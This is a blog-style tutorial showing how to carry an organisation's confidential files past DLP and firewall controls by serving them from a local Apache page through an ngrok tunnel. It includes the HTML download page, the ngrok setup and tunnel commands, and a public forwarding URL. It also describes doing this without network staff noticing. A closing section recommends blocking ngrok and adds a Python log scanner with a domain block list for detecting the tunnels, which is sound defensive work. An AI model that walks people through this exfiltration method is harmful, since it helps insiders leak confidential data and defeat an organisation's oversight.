How to Bypass Organisation DLP (Data Leak Prevention) Security Using Ngrok

In this tutorial I’m going to illustrate how data can be exfiltrated past an organisation’s security controls using Ngrok.

What is Ngrok & how does it establish the connection?

  • Ngrok is a secure, introspectable tunnel to localhost.
  • It is essentially a reverse proxy connection to your localhost.
  • It is a multi-platform tool, available for Windows, Linux, macOS & FreeBSD etc.
  • It establishes the connection without any need for NAT (port forwarding) on firewalls & routers. This means that, without the knowledge of network security personnel, one can exfiltrate the data of any system and also bypass the organisation’s Data Leak Prevention: because the tunnel is an outbound connection originating from localhost, it is difficult for NG (Next Generation) Firewalls to inspect the data flowing through it.
  • After the connection is established, the services hosted on your localhost, i.e. web server, FTP server, SSH etc., become accessible from the Internet through the URL generated by Ngrok. All the confidential data of the organisation can be sent out to the Internet.

Was Ngrok built to encourage hacktivism?

  • Well, of course not. It was built for developers to demonstrate projects deployed on their own systems to clients, removing the dependency on network security personnel.
  • Without any knowledge of NAT you can make your system accessible on the Internet, depending upon the services allowed, i.e. HTTP, HTTPS & SSH etc.
  • It is not advisable to expose all services of your system on the Internet.
  • Bad actors don’t need use cases; they will utilise this genuine tool to compromise the security of an organisation, which leads to hacktivism.
  • The motivation behind this hacktivism can be revenge, political or social incentives, protest, or a desire to embarrass certain organisations or individuals.

Conditions under which exfiltration using Ngrok is possible

1. The system from which you want to exfiltrate data should have an Internet connection.

2. The organisation’s perimeter security appliance, i.e. an NGFW such as Fortigate, Palo Alto, Check Point, Cisco Firepower or Juniper SRX etc., permits this type of proxy.

How to use Ngrok to exfiltrate data past the organisation’s security?

To use Ngrok for exfiltration testing, follow the steps mentioned below. In our case we have used a Linux system for the demonstration.

1. Open the Ngrok website by typing the URL https://ngrok.com into your web browser.

2. Sign up for a free account & download the Ngrok file as shown in the image below.

3. Start the web server on your system & host a web application containing the files you want to exfiltrate from your organisation to the Internet. In my case I’m using the Apache web server & created the HTML page below, saved as vishal.html, containing a file link for demonstration.

Filename: vishal.html

Code

<!DOCTYPE html>
<html>
<head>
<title>Confidential File of Organisation</title>
</head>
<body>
<div>
<b>Download Files</b><br>
<a href="Confidential%20File.docx" download>Confidential File</a>
</div>
</body>
</html>

Note: The Confidential File.docx file exists in my /var/www/html folder (the space in the filename is written as %20 in the link). You can also put the path of a file on a remote computer that is accessible from your system in the ‘href’.

4. Ensure this web application is accessible on your localhost by browsing to ‘localhost/vishal.html’ in your web browser.

5. Obtain your Ngrok authtoken by navigating to Authentication –> Your Authtoken in your Ngrok account & copy the authtoken, as shown in the image below.

6. Navigate to the folder into which you downloaded Ngrok & then extract the zip file using the commands below:

iamvsm@SaraswatiRepository:~$ cd Downloads

iamvsm@SaraswatiRepository:~/Downloads$ unzip ngrok-stable-linux-amd64.zip

After extracting the zip file you’ll find the ngrok binary.

7. Run & authorise Ngrok with your online account to get it working using the command below:

iamvsm@SaraswatiRepository:~/Downloads$ ./ngrok authtoken 1iS0Gc******o6M7yEauSx

Authtoken saved to configuration file: /home/iamvsm/.ngrok2/ngrok.yml

Now your system is linked to your Ngrok account & ready to establish the tunnel.

8. We’ll establish an HTTP tunnel in Ngrok to make our web server available on the Internet using the command below:

iamvsm@SaraswatiRepository:~/Downloads$ ./ngrok http 80

As you can see in the image above, two links (HTTP & HTTPS) are forwarding connections to localhost, meaning we have successfully bypassed the organisation’s security & these links are accessible from the Internet.

You can use either of these links; in our case we’ll be using HTTPS.

Data Exfiltration

We will open the link https://323b7489c716.ngrok.io/vishal.html (as we have hosted the code & files on the vishal.html page) on another device having a different Internet connection.

As you can see, we have successfully exfiltrated data past the organisation’s security using Ngrok.

Recommendation

It is advisable to block this type of proxy if your organisation is conscious about data security. The reasons behind successful hacktivity are misconfiguration, lack of security knowledge, and lethargic policy implementation & administration.
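One practical way to act on this recommendation is to look for ngrok traffic in the logs the perimeter already produces. The script below is an added example written for this post; it is not part of the original tutorial or of ngrok. It runs over a constructed proxy/DNS log (one "timestamp source destination:port" line each) and flags hosts that belong to ngrok domains. The ngrok.io suffix is the one seen in the forwarding URL above; tunnel.ngrok.com, connect.ngrok-agent.com, ngrok-free.app and ngrok.app are assumed to be current ngrok agent and tunnel domains and should be checked against ngrok’s own documentation before the list is deployed. Matching is done on DNS labels rather than by substring, so a look-alike host such as ngrok.io.example.test is not a false positive.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Domains used by ngrok tunnel endpoints and agents. "ngrok.io" is the suffix in the
# tutorial's own forwarding URL; the rest are assumptions about ngrok's current
# endpoints and should be verified before use in production.
TUNNEL_DOMAINS = (
    "ngrok.io",         # classic public tunnel hostnames (e.g. 323b7489c716.ngrok.io)
    "ngrok.com",        # agent control connection (tunnel.ngrok.com) and website, assumed
    "ngrok-agent.com",  # v3 agent control connection (connect.ngrok-agent.com), assumed
    "ngrok-free.app",   # newer free-tier tunnel hostnames, assumed
    "ngrok.app",        # newer paid-tier tunnel hostnames, assumed
)

# Constructed sample log: "timestamp src dst_host:port" per line, plus one malformed line.
SAMPLE_LOG = """\
2021-03-01T09:00:01Z 10.20.30.41 www.example.com:443
2021-03-01T09:00:05Z 10.20.30.41 tunnel.ngrok.com:443
2021-03-01T09:00:09Z 10.20.30.77 ngrok.io.evil-lookalike.test:443
2021-03-01T09:01:12Z 10.20.30.41 323b7489c716.ngrok.io:443
2021-03-01T09:02:00Z 10.20.30.99 cdn.ngrok-free.app:443
malformed line without the expected fields
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<host>[^\s:]+)(?::(?P<port>\d+))?\s*$"
)


@dataclass(frozen=True)
class Hit:
    timestamp: str
    src: str
    host: str
    matched_domain: str


def matched_tunnel_domain(host: str) -> Optional[str]:
    """Return the tunnel domain that host belongs to, or None.

    Only an exact match or a proper subdomain counts, so
    "ngrok.io.evil-lookalike.test" does not match "ngrok.io".
    """
    host = host.lower().rstrip(".")
    for domain in TUNNEL_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def find_tunnel_connections(log_text: str) -> List[Hit]:
    """Parse the log and return every connection to a known tunnel domain."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not have the expected fields
        domain = matched_tunnel_domain(m["host"])
        if domain:
            hits.append(Hit(m["ts"], m["src"], m["host"], domain))
    return hits


def sources_to_investigate(hits: List[Hit]) -> List[str]:
    """Internal source addresses that reached a tunnel domain, deduplicated."""
    return sorted({h.src for h in hits})


if __name__ == "__main__":
    found = find_tunnel_connections(SAMPLE_LOG)
    for hit in found:
        print(f"{hit.timestamp} {hit.src} -> {hit.host} (matches {hit.matched_domain})")
    print("sources to investigate:", sources_to_investigate(found))
```

On the constructed log this reports the agent control connection from 10.20.30.41, the tunnel hostname that the tutorial itself produced, and a free-tier hostname from a second host, while ignoring the look-alike domain and the malformed line. The same suffix list can be loaded into the NGFW’s URL or DNS filtering category as a block list; the script is useful for checking historical logs before that block is enabled, and as a starting point for an alert rule afterwards.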

In my upcoming post I’ll demonstrate how to prevent these types of exfiltration.